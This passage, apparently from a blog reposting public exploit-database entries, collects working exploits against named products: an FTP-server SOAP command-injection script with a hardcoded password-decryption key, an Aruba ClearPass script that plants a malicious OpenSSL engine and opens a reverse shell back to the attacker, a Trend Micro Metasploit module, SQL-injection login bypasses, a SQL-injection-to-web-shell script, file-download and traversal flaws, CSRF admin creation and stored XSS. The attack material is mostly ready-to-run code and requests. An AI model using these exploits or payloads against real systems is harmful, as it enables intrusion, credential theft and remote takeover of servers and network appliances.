xpath=".//mstns:PlugIn" /> <xs:field xpath="mstns:PlugInID" /> </xs:unique> </xs:element> </xs:schema> """.replace("<", "&lt;").replace(">", "&gt;").replace('"', "&#34;").strip() # endregion # region xml_diffgram xml_diffgram = """ <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1"> <ConfigDataSet xmlns="http://tempuri.org/ConfigDataSet.xsd"> <PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" diffgr:hasChanges="modified"> <PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID> <Name>Process Execution</Name> <ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName> <PlugInTypeID>2</PlugInTypeID> <Configuration>{CONFIGURATION}</Configuration> <CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime> <ModifiedTime>2020-03-10T10:52:00.7496654+08:00</ModifiedTime> <UserInstance>false</UserInstance> <System>true</System> <ChangeSetID>{ID}</ChangeSetID> </PlugIn> <PlugInType diffgr:id="PlugInType1" msdata:rowOrder="0"> <PlugInTypeID>2</PlugInTypeID> <Name>Event</Name> <CreatedTime>2009-06-29T11:48:00+08:00</CreatedTime> <ModifiedTime>2009-06-29T11:48:00+08:00</ModifiedTime> </PlugInType> <ChangeSet diffgr:id="ChangeSet1" msdata:rowOrder="0"> <ChangeSetID></ChangeSetID> <Sequence>3</Sequence> <CreatedTime>2020-03-10T10:50:44.4209655+08:00</CreatedTime> <ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime> <IsPrimary>true</IsPrimary> </ChangeSet> </ConfigDataSet> <diffgr:before> <PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" xmlns="http://tempuri.org/ConfigDataSet.xsd"> <PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID> <Name>Process Execution</Name> <ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName> <PlugInTypeID>2</PlugInTypeID> <Configuration></Configuration> <CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime> <ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime> <UserInstance>false</UserInstance> <System>true</System> <ChangeSetID></ChangeSetID> </PlugIn> </diffgr:before> </diffgr:diffgram> """.strip() # endregion # region config config = """ <TriggerDataSet xmlns="http://tempuri.org/TriggerDataSet.xsd"> <ProcessConfig> <ProcessConfigID>0</ProcessConfigID> <MaxProcesses>10</MaxProcesses> <RunTimeout>0</RunTimeout> <QueueTimeout>0</QueueTimeout> <KillOnExit>true</KillOnExit> </ProcessConfig> <ProcessRule> <ProcessRuleID>1</ProcessRuleID> <ProcessConfigID>0</ProcessConfigID> <Name>trigger</Name> <Enabled>true</Enabled> <ProcessType>0</ProcessType> <ProcessPath>cmd.exe</ProcessPath> <Arguments>/c {CMD}</Arguments> <PathFilter>*</PathFilter> <OnError>false</OnError> <OnSuccess>true</OnSuccess> <RowOrder>1</RowOrder> </ProcessRule> <ProcessEvent> <ProcessRuleID>1</ProcessRuleID> <EventType>LogIn</EventType> </ProcessEvent> </TriggerDataSet> """.strip() # endregion def prepare_update_config(uuid, cmd): config_payload = config config_payload = config_payload.replace('{CMD}', cmd) config_payload = config_payload.replace('<', '&lt;') config_payload = config_payload.replace('>', '&gt;') diffgram_payload = xml_diffgram diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload) diffgram_payload = diffgram_payload.replace('{ID}', uuid) diffgram_payload = diffgram_payload.replace('&', '&#38;') diffgram_payload = diffgram_payload.replace('<', '&#60;') diffgram_payload = diffgram_payload.replace('>', '&#62;') diffgram_payload = diffgram_payload.replace('"', '&#34;') payload = update_config payload = payload.replace('{XMLSCHEMA}', xml_schema) payload = payload.replace('{XMLDIFFGRAM}', diffgram_payload) return payload def send_request(sftp, payload): payload = b64encode(bytes(payload, 'utf-8')).decode('utf-8') res = sftp._request(CMD_EXTENDED, 'admin@enterprisedt.com', 'SOAP64 ' + payload) return res def convert_changeset_id_to_uuid(changeset_id): a = struct.pack('i', int(changeset_id[0].text)) # 32 b = struct.pack('h', int(changeset_id[1].text)) # 16 c = struct.pack('h', int(changeset_id[2].text)) # 16 d = struct.pack('B', int(changeset_id[3].text)) # 8 e = struct.pack('B', int(changeset_id[4].text)) # 8 f = struct.pack('B', int(changeset_id[5].text)) # 8 g = struct.pack('B', int(changeset_id[6].text)) # 8 h = struct.pack('B', int(changeset_id[7].text)) # 8 i = struct.pack('B', int(changeset_id[8].text)) # 8 j = struct.pack('B', int(changeset_id[9].text)) # 8 k = struct.pack('B', int(changeset_id[10].text)) # 8 x = a + b + c + d + e + f + g + h + i + j + k return uuid.UUID(bytes_le=x) def get_uuid(sftp): res = send_request(sftp, get_server_info) if res[0] != 201: print('[!] Error could not request server info via SFTP') sys.exit(1) res = b64decode(res[1].get_string()).decode('utf-8') res = ET.fromstring(res) changeset_id = res.find('.//SyncChangeSetID') uuid = convert_changeset_id_to_uuid(changeset_id) return str(uuid) def login(host, port, user, password): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(host, port, user, password, look_for_keys=False, allow_agent=False) return ssh.open_sftp() def send_command(sftp, cmd): uuid = get_uuid(sftp) payload = prepare_update_config(uuid, cmd) res = send_request(sftp, payload) if res[0] != 201: print('[!] Error could not send update config request via SFTP') sys.exit(1) def decrypt_password(password): key = b64decode('HKVV76GdVuzXne/zxtWvdjA2d2Am548E') iv = b64decode('gVGow/9uLvM=') encrypted = b64decode(password) cipher = DES3.new(key=key, iv=iv, mode=DES3.MODE_CBC) decrypted = cipher.decrypt(encrypted) return unpad(decrypted, 8).decode('utf-16') if len(sys.argv) != 6: print('[!] Missing arguments') print('[ ] Usage: {} <target> <port> <username> <encrypted-password> <cmd>'.format(sys.argv[0])) print("[ ] E.g. {} 192.168.1.128 14983 admin DEomw27OY7sYZs4XjYA2kVB4LEB5skN4 'whoami > C:\\x.txt'".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) username = sys.argv[3] password = sys.argv[4] cmd = sys.argv[5] print('[ ] Decrypting password') password = decrypt_password(password) print('[ ] Decrypted password is "{}"'.format(password)) print('[ ] Logging in') sftp = login(target, port, username, password) print('[ ] Sending command') send_command(sftp, cmd) print('[ ] Command successfully sent, triggering...') sftp = login(target, port, username, password)
  5. HireHackking

    Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution # Date: 2020-07-06 # Exploit Author: SpicyItalian # Vendor Homepage: https://www.arubanetworks.com/products/security/network-access-control/ # Version: ClearPass 6.7.x prior to 6.7.13-HF, ClearPass 6.8.x prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1 # Tested on: ClearPass 6.7.0 # CVE: CVE-2020-7115 Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine. #!/usr/bin/env bash if [ "$#" -ne 4 ]; then echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]" exit 0 fi cat <<EOF >>payload.c #include <unistd.h> __attribute__((constructor)) static void init() { execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL); } EOF gcc -fPIC -c payload.c gcc -shared -o payload.so -lcrypto payload.o rm -f payload.c payload.o curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null & cat <<"EOF" /(\ ¡ !´\ | )\ `. | `.) \,-,-- ( / / `'-.,;_/ `---- EOF printf "\nPleasea waita for your spicy shell...\n\n" ncat -v -l $3 $4
  6. HireHackking

    Barangay Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Barangay Management System 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-07-05 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/13484/barangay-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/antiokz/barangay_1.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : index.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/Barangay/adminlogin.php POST /Barangay/adminlogin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 74 Referer: http://localhost/Barangay/ Cookie: PHPSESSID=jt0a3e89ukmktgtuoedjqmktge Connection: keep-alive Upgrade-Insecure-Requests: 1 admin_name=%27%3D%27%27or%27&admin_pass=%27%3D%27%27or%27&adminlogin=Login: undefined HTTP/1.1 200 OK Date: Sat, 04 Jul 2020 20:35:25 GMT Server: Apache/2.4.39 (Win64) PHP/7.2.18 X-Powered-By: PHP/7.2.18 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 3638 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  7. HireHackking

    HelloWeb 2.0 - Arbitrary File Download

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: HelloWeb 2.0 - Arbitrary File Download # Date: 2020-07-09 # Vendor Homepage: https://helloweb.co.kr/ # Version: 2.0 [Latest] and previous versions # Exploit Author: bRpsd # Contact Author: cy[at]live.no # Google Dork: inurl:exec/file/download.asp # Type: WebApps / ASP ----------------------------------------------------- Vulnerable code: ###################################################################################################### Dim filepath, filename, root_path, fso, root_folder, attachfile, objStream, strFile filepath = Request.QueryString("filepath") filename = Request.QueryString("filename") filepath = Replace(filepath,"/","\") root_path = server.MapPath("/") Set fso = CreateObject("Scripting.FileSystemObject") Set root_folder = fso.GetFolder(root_path) attachfile = root_path & filepath & "\" & filename Response.Clear Response.ContentType = "application/unknown" Response.AddHeader "Pragma", "no-cache" Response.AddHeader "Expires", "0" Response.AddHeader "Content-Transfer-Encoding", "binary" Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename) Set objStream = Server.CreateObject("ADODB.Stream") objStream.Open objStream.Type = 1 objStream.LoadFromFile attachfile Response.BinaryWrite objStream.Read Response.Flush ###################################################################################################### Vulnerability: Arbitrary File Download Location: http://localhost/exec/file/download.asp Parameters: filename & filepath Proof of concept: GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 RESPONSE: HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/unknown; Charset=utf-8 Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT Server: Content-Transfer-Encoding: binary Content-Disposition: attachment; filename = web.config Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/ Access-Control-Allow-Origin: * x-xss-protection: 1; mode=block Date: Thu, 09 Jul 2020 10:51:14 GMT Connection: close
  8. HireHackking

    Park Ticketing Management System 1.0 - 'viewid' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection # Date: 2020-07-13 # Exploit Author: gh1mau # Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/ # Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952 # Version: V1.0 # Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64) import requests #this script is for POC purpose, you could add your own error checking mechanism command = "whoami" url = "http://localhost:80/ptms/view-normal-ticket.php?viewid=1%27%20UNION%20ALL%20SELECT%200x3c3f7068702073797374656d28245f524551554553545b276768316d6175275d293b203f3e,NULL,NULL,NULL,NULL,NULL,NULL%20INTO%20OUTFILE%20%27C:/UwAmp/www/ptms/1.php%27--%20-" payload = "" headers = { "Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0", "Connection": "close", "Host": "localhost", "Accept-Encoding": "gzip, deflate", "Upgrade-Insecure-Requests": "1", "Accept-Language": "en-US,en;q=0.5" } response = requests.request("GET", url, data=payload, headers=headers) print("[+] Injecting Web Shell...\n") url2 = "http://localhost:80/ptms/1.php?gh1mau=" + command payload2 = "" headers2 = { "Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0", "Connection": "close", "Host": "localhost", "Accept-Encoding": "gzip, deflate", "Upgrade-Insecure-Requests": "1", "Accept-Language": "en-US,en;q=0.5" } response2 = requests.request("GET", url2, data=payload2, headers=headers2) print("Web Shell: " + url2) print(response2.text)
  9. HireHackking

    Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution', 'Description' => %q{ This module exploits multiple vulnerabilities together in order to achive a remote code execution. Unauthenticated users can execute a terminal command under the context of the root user. The specific flaw exists within the LogSettingHandler class of administrator interface software. When parsing the mount_device parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability. Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this vulnerability in order to communicate with internal services in the product. Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the IWSS user. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user. Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module ], 'References' => [ ['CVE', '2020-8604'], ['CVE', '2020-8605'], ['CVE', '2020-8606'], ['ZDI', '20-676'], ['ZDI', '20-677'], ['ZDI', '20-678'] ], 'Privileged' => true, 'DefaultOptions' => { 'SSL' => true, 'payload' => 'python/meterpreter/reverse_tcp', 'WfsDelay' => 30 }, 'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } }, 'Platform' => ['python'], 'Arch' => ARCH_PYTHON, 'Targets' => [ ['Automatic', {}] ], 'DisclosureDate' => '2020-06-10', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(8443), OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080]) ] ) end def hijack_cookie # Updating SSL and RPORT in order to communicate with HTTP proxy service. if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end port_restore = datastore['RPORT'] datastore['RPORT'] = datastore['PROXY_PORT'] @jsessionid = '' # We are exploiting proxy service vulnerability in order to fetch content of catalina.out file print_status('Trying to extract session ID by exploiting reverse proxy service') res = send_request_cgi({ 'method' => 'GET', 'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication", 'vars_get' => { 'command' => 'filecontent', 'wt' => 'filestream', 'generation' => 1, 'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out' } }) # Restore variables and validate extracted sessionid datastore['SSL'] = true if ssl_restore datastore['RPORT'] = port_restore # Routine check on res object unless res fail_with(Failure::Unreachable, 'Target is unreachable.') end # If the res code is not 200 that means proxy service is not vulnerable. unless res.code == 200 @jsessionid = -1 return end # Now we are going to extract all JESSIONID from log file and store them in array. cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten if cookies.empty? @jsessionid = 0 print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.') return end print_good("Extracted number of JSESSIONID: #{cookies.length}") # We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables. datastore['SSL'] = true if ssl_restore datastore['RPORT'] = port_restore # Latest cookie in the log file is the one most probably active. So that we use reverse on array. cookies.reverse.each_with_index do |cookie, index| print_status("Testing JSESSIONID ##{index} : #{cookie}") # This endpoints is basically check session :) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'), 'cookie' => "JSESSIONID=#{cookie}" }) # Routine res check unless res fail_with(Failure::UnexpectedReply, 'Target is unreachable.') end # If the cookie is active ! if res.code == 200 && res.body.include?('session_flag') print_good("Awesome!!! JESSIONID ##{index} is active.") @jsessionid = cookie break end print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.") end if @jsessionid.empty? print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.') end end def check # # @jsessionid can be one of the following value # # -1 = Proxy service is not vulnerable, which means we'r not gonna # be able to read catalina.out # # 0 = Proxy service is vulnerable, but catalina.out does not contain any # jessionid string yet ! # # empty = Proxy service is vulnerable, but jessionid within log file but # none of them are valid:( # # string = Proxy service is vulnerable and sessionid is valid ! # hijack_cookie if @jsessionid == -1 CheckCode::Safe else CheckCode::Vulnerable end end def exploit unless check == CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end # # 0 => Proxy service is vulnerable, but catalina.out does not contain any # jessionid string yet ! # # empty => Proxy service is vulnerable, but jessionid within log file but # none of them are valid:( # if @jsessionid.empty? || @jessionid == 0 fail_with Failure::NoAccess, '' end print_status('Exploiting command injection vulnerability') # Yet another app specific bypass is going on here. # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc) # For that reason, I am planting our payload dropper within the perl command. cmd = "python -c \"#{payload.encoded}\"" final_payload = cmd.to_s.unpack1('H*') p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" vars_post = { mount_device: "mount $(#{p}) /var/offload", cmd: 'mount' } send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'), 'cookie' => "JSESSIONID=#{@jsessionid}", 'ctype' => 'application/json', 'data' => vars_post.to_json }) end end
  10. HireHackking

    BSA Radar 1.6.7234.24750 - Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit title: BSA Radar 1.6.7234.24750 - Local File Inclusion # Date: 2020-07-08 # Exploit Author: William Summerhill # Vendor homepage: https://www.globalradar.com/ # Version: BSA Radar - Version 1.6.7234.24750 and lower # CVE-2020-14946 - Local File Inclusion # Description: The Administrator section of the Surveillance module in Global RADAR - BSA Radar 1.6.7234.X # and lower allows users to download transaction files. When downloading the files, # a user is able to view local files on the web server by manipulating the FileName # and FilePath parameters in the URL, or while using a proxy. This vulnerability could # be used to view local sensitive files or configuration files on the backend server. Vulnerable endpoint: /UC/downloadFile.ashx The current user is required to have valid privileges to send requests to the target vulnerable endpoint. Proof of Concept: HTTP Request PoC: VALID REQUEST: GET /UC/downloadFile.ashx?ID=XXXX&FileName=SOMEFILE.TXT&UploadStyle=1&UploadStyle=1&UploadSource=6 LFI EXPLOIT REQUEST: GET /UC/downloadFile.ashx?ID=XXXX&FileName=C:\Windows\debug\NetSetup.log&UploadStyle=1&UploadSource=6 The entire LFI path can be injected into the "FileName" parameter in order to enumerate existing files on the server. Other LFI files can be tested (such as the Windows hosts file) for further verification and disclosures. Tested on: Windows CVE: CVE-2020-14946 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14946
  11. HireHackking

    Park Ticketing Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Park Ticketing Management System 1.0 - Authentication Bypass # Date: 2020-07-13 # Exploit Author: gh1mau # Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/ # Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952 # Version: V1.0 # Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64) Vulnerable File: ---------------- /index.php Vulnerable Code: ----------------- line 8: $adminuser=$_POST['username']; Vulnerable Issue: ----------------- $adminuser=$_POST['username']; has no sanitization POC User Login: --------------- URL: http://localhost/ptms/index.php Username : ' or '1'='1'# Password : anything Python POC: ----------- import requests,re url = "http://localhost:80/ptms/index.php" payload = "username=%27+or+%271%27%3D%271%27%23&password=anything&login=" headers = { "Origin": "http://localhost", "Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0", "Connection": "close", "Referer": "http://localhost/ptms/index.php", "Host": "localhost", "Accept-Encoding": "gzip, deflate", "Upgrade-Insecure-Requests": "1", "Accept-Language": "en-US,en;q=0.5", "Content-Length": "80", "Content-Type": "application/x-www-form-urlencoded" } pattern = "PTMS ADMIN" response = requests.request("POST", url, data=payload, headers=headers) if re.findall(pattern,response.text): print("[+] Authentication bypassed using the following payload : " + payload) else: print("[!] Something wrong somewhere")
  12. HireHackking

    SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin) # Exploit Author: Metin Yunus Kandemir # Date: 2020-07-15 # Vendor Homepage: https://www.supermicro.com/ # Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 # CVE: CVE-2020-15046 # Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery # Description: # The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 # allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users. # The fixed versions are BIOS 3.2 and firmware 03.88. # PoC : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST"> <input type="hidden" name="username" value="JOKER" /> <input type="hidden" name="original&#95;username" value="2" /> <input type="hidden" name="password" value="onebadday" /> <input type="hidden" name="new&#95;privilege" value="4" /> <input type="submit" value="submit request" /> </form> </body> </html>
  13. HireHackking

    Zyxel Armor X1 WAP6806 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal # Date: 2020-06-19 # Exploit Author: Rajivarnan R # Vendor Homepage: https://www.zyxel.com/ # Software [http://www.zyxelguard.com/WAP6806.asp] # Version: [V1.00(ABAL.6)C0] # CVE: 2020-14461 # Tested on: Linux Mint / Windows 10 # Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD] # As a result of the research, one vulnerability identified. # (Directory Traversal) # Technical information is provided below step by step. # [1] - Directory Traversal Vulnerability # Vulnerable Parameter Type: GET # Vulnerable Parameter: TARGET/Zyxel/images/eaZy/] # Proof of Concepts:https://TARGET/Zyxel/images/eaZy/ <https://target/Zyxel/images/eaZy/>
  14. HireHackking

    Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass # Date: 2020-07-03 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system # Software Link: https://github.com/mrzulkarnine/Web-based-hotel- booking-system # Version: 0.1.0 # Tested on: Kali Linux Source code(localhost/admin/loginauth.php): <?php session_start(); $_SESSION['username'] = $_POST['username']; $_SESSION['password'] = $_POST['password']; include './auth.php'; $re = mysql_query("select * from user where username = '".$_SESSION['username']."' AND password = '".$_SESSION['password']."' " ); echo mysql_error(); if(mysql_num_rows($re) > 0) { header('Refresh: 0;url=dashboard.php'); } else { session_destroy(); header("location: index.htm"); } ?> Payload: Username: 1' or 1 = 1 LIMIT 1# Password: 1' or 1 = 1 LIMIT 1#
  15. HireHackking

    Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting # Date: 2020-06-29 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html # Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/ # Version: 0.1.0 # Tested on: Kali Linux Source code(review.php): <?php if($result) : while($row1 = $result->fetch_array()) : ?> <div class="con"> <div class="row"> <div class="col-sm-4"> <em style="color: black;"><?= $row1['comment']; ?></em> </div> POC: 1. http://192.168.1.58/a/review.php?pid=31 go 2. We send the payload (<script>alert(1)</script>) 3. Write a review payload and submit 4. And refresh the page
  16. HireHackking

    Online Polling System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Polling System 1.0 - Authentication Bypass # Date: 2020-07-20 # Author: AppleBois # Version: NULL # Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html # # Administration Control Panel || Authentication Bypass # Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php # ###################################################################################### #Vulnerable Code # #$myusername=$_POST['myusername']; #$mypassword=$_POST['mypassword']; #$encrypted_mypassword=md5($mypassword); # #$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'"); # #$count=mysqli_num_rows($result); # #if($count==1){ # #$user = mysqli_fetch_assoc($result); #$_SESSION['member_id'] = $user['member_id']; #header("location:student.php"); #} # ###################################################################################### POST /admin/checklogin.php HTTP/1.1 Host: 10.10.10.2:81 Content-Length: 53 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.10.2:81 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.10.2:81/online/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5 Connection: close myusername=' or 1=1#&mypassword=ad&Submit=Login
  17. HireHackking

    Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection

    HireHackking posted a blog entry in Hacker Technology
